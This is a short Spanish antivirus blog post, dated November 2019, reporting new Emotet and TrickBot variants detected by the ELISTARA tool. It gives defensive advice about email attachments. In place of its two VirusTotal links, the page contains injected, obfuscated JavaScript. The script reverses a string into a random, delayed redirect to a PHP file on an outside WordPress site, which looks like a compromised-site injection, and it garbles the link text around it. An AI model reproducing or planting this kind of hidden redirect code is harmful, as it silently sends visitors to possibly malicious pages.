NUEVAS MUESTRAS PEDIDAS POR EL ELISTARA, RECIBIDAS PARA ANALIZAR, SON VARIANTES DE EMOTET Y TOTBRICK

4 ficheros detectados por la heuristica del ELISTARA, los pasamos a controlar especificamente a partir del ELISTARA de hoy

Los informes de virustotal al respecto, son:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/gui/file/4f8a9c6188ed6943445b29f618a1c48def7dc790f3553baa03030febe5304818/detection” target=”_blank” rel=”noopener noreferrer”>FICHERO CLIENTMETERED.EXE.Muestra EliStartPage v42.26>

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/gui/file/b767eed88f0ab1e78d56c2d44530a9754c169f1f8dfb70b72091d10e18a968c7/detection” target=”_blank” rel=”noopener noreferrer”>FICHERO LWHEW04Y.EXE.Muestra EliStartPage v42.26>

Como vamos diciendo, no paran de salir nuevas variantes de estos malwares que los antivirus van controlando, si bien inicialmente solo se pueden controlar NO EJECUTANDO FICHEROS ANEXADOS A MAILS NO SOLICITADOS, y con utilidades que impiden la creación de los mismos cuando se ejecutan ficheros con las macros del EMOTET que descargan ficheros EXE maliciosos, como pueden ser TOTBRICK, ransomwares como el RYUK, etc.

Sugerimos leer las noticias de nuestro blog al respecto de bloquear la creación de estos EXE para evitar su infección incluso antes de que los AV los controlen.

saludos

ms, 5-11-2019